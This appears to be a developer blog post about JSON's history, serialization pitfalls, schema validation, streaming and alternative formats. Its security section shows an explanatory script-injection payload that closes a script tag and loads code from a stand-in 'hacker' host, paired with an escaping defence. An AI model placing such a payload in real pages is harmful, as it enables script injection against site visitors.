All things about JSON.
Beginning
JSON was born out of web platform limitations and a bit of creativity. There was `XMLHttpRequest` to make requests to the server without a full page reload, but XML is "heavy" on the wire, so Douglas Crockford thought of a clever trick: we can use JavaScript Object Notation and `eval` to pass data from the server to the client, or vice versa, in an easy way. But it is not safe to execute arbitrary code (`eval`), especially if it comes from a third-party source. So the next step was to standardize it and implement a dedicated parser for it. Later it became a standard in all browsers, and now we can use it as `JSON.parse`.
Limitations
Given how it was born, JSON comes with some limitations.
Asymmetric encoding/decoding
You know how JS pretends that type errors don't exist and just coerces values at any cost, even when it doesn't make much sense. `JSON.stringify` follows the same tradition, which means that `x == JSON.parse(JSON.stringify(x))` doesn't always hold. For example:
- `Date` will be turned into its `string` representation, and after decoding it will stay a `string`
- `Map`, `WeakMap`, `Set`, `WeakSet` will be turned into `"{}"` - they will lose contents and type
- `BigInt`, for a change, throws `TypeError: Do not know how to serialize a BigInt`
- a function will be converted to `undefined`
- `undefined` will be converted to `undefined`
- an ES6 class and `new function(){}` will be converted into a representation of a plain object, but will lose the type
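To see the asymmetry in action, here is a quick console session (the exact date string will differ, of course):

```ts
JSON.parse(JSON.stringify(new Date()));
// "2023-01-01T00:00:00.000Z" - a string now, not a Date

JSON.stringify(new Map([["a", 1]]));   // '{}' - contents and type are gone
JSON.stringify(new Set([1, 2, 3]));    // '{}' - same story

JSON.stringify(() => 1);               // undefined - functions disappear
JSON.stringify({ fn: () => 1, x: 1 }); // '{"x":1}' - and so do their keys

// JSON.stringify(10n);                // throws TypeError at runtime
```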
Solution: one possible solution here is to use a static type system like TypeScript or Flow to prevent asymmetric types:
```ts
// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;

type JSONObject = { [key: string]: JSONValue };
type JSONArray = Array<JSONValue>;

export const symmetricStringify = (x: JSONValue) => JSON.stringify(x);
```
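With this helper, the type checker flags non-JSON values at compile time. A small illustration (the object literals are just examples):

```ts
symmetricStringify({ x: 1, tags: ["a"] }); // fine
// @ts-expect-error Date has methods, so it is not assignable to JSONValue
symmetricStringify({ when: new Date() });
```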
Though it will not save us from `TypeError: Converting circular structure to JSON` - we will get to that later.
Security: script injection
If you use JSON to pass data from the server to the client inside HTML - for example, the initial value of the Redux store in case of server-side rendering, or `gon` in Ruby - be aware that there is a risk of a script injection attack:
```html
<script>
var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
```
Solution: escape JSON before passing it to HTML
```js
const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;

// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
  "<": "\\u003C",
  ">": "\\u003E",
  "/": "\\u002F",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029"
};

const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);

export const safeStringify = (x) => escape(JSON.stringify(x));
```
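For example, with the payload from the attack above:

```ts
console.log(safeStringify({ user_input: "</script><script src=http://hacker/script.js>" }));
// {"user_input":"\u003C\u002Fscript\u003E\u003Cscript src=http:\u002F\u002Fhacker\u002Fscript.js\u003E"}
// the HTML parser never sees a literal </script>, so the tag cannot be closed early
```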
Side note: collection of JSON implementation vulnerabilities
Lack of schema
JSON is schemaless, which makes sense given that JS is dynamically typed. But this means you need to verify the shape (the types) yourself - `JSON.parse` won't do it for you.
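For illustration, here is what verifying the shape by hand looks like (the `User` type is a made-up example):

```ts
type User = { name: string; age: number };

// JSON.parse returns `any`, so nothing stops us from reading a wrong shape
// unless we write a type guard ourselves:
const isUser = (x: unknown): x is User =>
  typeof x === "object" &&
  x !== null &&
  typeof (x as any).name === "string" &&
  typeof (x as any).age === "number";

const raw: unknown = JSON.parse('{"name":"Ada"}');
if (isUser(raw)) {
  raw.age; // safe to use here
}
```

Writing such guards by hand for every type gets tedious fast, which is what IO validation libraries automate.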
Solution: I wrote about this problem before - use IO validation
Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.
Lack of schema and serializer/parser
Having a schema for the parser can solve the asymmetry issue for `Date`: if we know that we expect a `Date` at some place, we can use the string representation to create a JS `Date` out of it.

Having a schema for the serializer can solve the issue for `BigInt`, `Map`, `WeakMap`, `Set`, `WeakSet`, ES6 classes, and `new function(){}`. We can provide a specific serializer/parser for each type:
```ts
import * as t from 'io-ts'

// codec that decodes an ISO string into a Date and encodes it back
const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
```
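Assuming io-ts 1.x (matching the snippet above), usage looks roughly like this:

```ts
DateFromString.decode("1973-11-29T21:33:09.000Z"); // right(Date)
DateFromString.decode("not a date");               // left(validation errors)
DateFromString.encode(new Date(0));                // "1970-01-01T00:00:00.000Z"
```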
Side note: see also this proposal
Lack of schema and performance
Having a schema can improve the performance of the parser. For example, see jitson and FAD.js.
Side note: see also fast-json-stringify
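A rough sketch of the schema-based serialization idea, using fast-json-stringify (check the library's README for the exact API):

```ts
import fastJson from "fast-json-stringify";

// the schema is compiled once into a specialized stringify function
const stringifyUser = fastJson({
  type: "object",
  properties: {
    name: { type: "string" },
    age: { type: "integer" }
  }
});

stringifyUser({ name: "Ada", age: 36 }); // '{"name":"Ada","age":36}'
```

Because the shape is known upfront, the generated function can skip all the type dispatch that a generic `JSON.stringify` has to do.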
Stream parser/serializer
When JSON was invented, nobody thought about using it for gigabytes of data. If you want to do something like that, take a look at streaming parsers.
Also, you can use a JSON stream to improve UX with a slow backend - see oboejs.
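A minimal sketch with oboejs (the URL, the `things.*` pattern, and the UI helpers are made up):

```ts
import oboe from "oboe";

declare function renderRow(thing: unknown): void; // hypothetical UI helpers
declare function hideSpinner(): void;

// start rendering items as they arrive, instead of waiting for the full body
oboe("/api/things")
  .node("things.*", (thing: unknown) => {
    renderRow(thing);
    return oboe.drop; // let oboe free the parsed node after we are done with it
  })
  .done(() => hideSpinner());
```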
Beyond JSON
uneval
If you want to serialize actual JS code and preserve types, references, and cyclic structures, JSON will not be enough. You will need an "uneval" - a small sketch follows the lists below. Check out some of these:
- devalue
- lave
- js-stringify
- node-uneval
- node-tosource - Converts JavaScript objects to source
Other "variations to this tune":
- LJSON - JSON extended with pure functions
- serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
- arson - Efficient encoder and decoder for arbitrary objects
- ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
- serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes
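This is also where the circular structure problem from earlier gets a solution. A sketch with devalue (assuming its `uneval` export; check the README for the current API):

```ts
import { uneval } from "devalue";

const a: any = { name: "cycle" };
a.self = a; // JSON.stringify(a) would throw "Converting circular structure" here

const code = uneval(a); // a JS expression as a string, cycles included
const copy = (0, eval)(code);
copy.self === copy; // true - the cycle survived the round trip
```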
As a configuration file
JSON was invented to transmit data, not to store configuration. Yet people use it for configuration anyway, because it is an easy option.
JSON lacks comments, requires quotes around keys, prohibits a comma after the last element of an array or dictionary, and requires paired `{}` and `[]`. There is no real solution for this except to use another format, like JSON5, YAML, or TOML.
Binary data
JSON is more compact than XML, yet not the most compact option. Binary formats are even more efficient. Check out MessagePack.
Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.
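A minimal round trip with the official JavaScript implementation (@msgpack/msgpack - the package choice is my assumption, the article only names the format):

```ts
import { encode, decode } from "@msgpack/msgpack";

const payload = { id: 1, tags: ["a", "b"] };
const bytes = encode(payload);  // Uint8Array: binary, more compact than JSON text
const restored = decode(bytes); // back to { id: 1, tags: ["a", "b"] }
```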
Binary data and schema
Having a binary format with a schema allows for some crazy optimizations, like random access or zero-copy. Check out Cap'n Proto.
Query language
JSON (like anything JS-related) is super popular, so people need to work with it more and more, and have started to build tools around it, like JSONPath and jq.
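For a taste of JSONPath, a sketch with the jsonpath npm package (the package choice is my assumption):

```ts
import jp from "jsonpath";

const data = { store: { book: [{ author: "Tolkien" }, { author: "Le Guin" }] } };
jp.query(data, "$.store.book[*].author"); // ["Tolkien", "Le Guin"]
```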
Did I miss something?
Leave a comment if I missed something. Thanks for reading.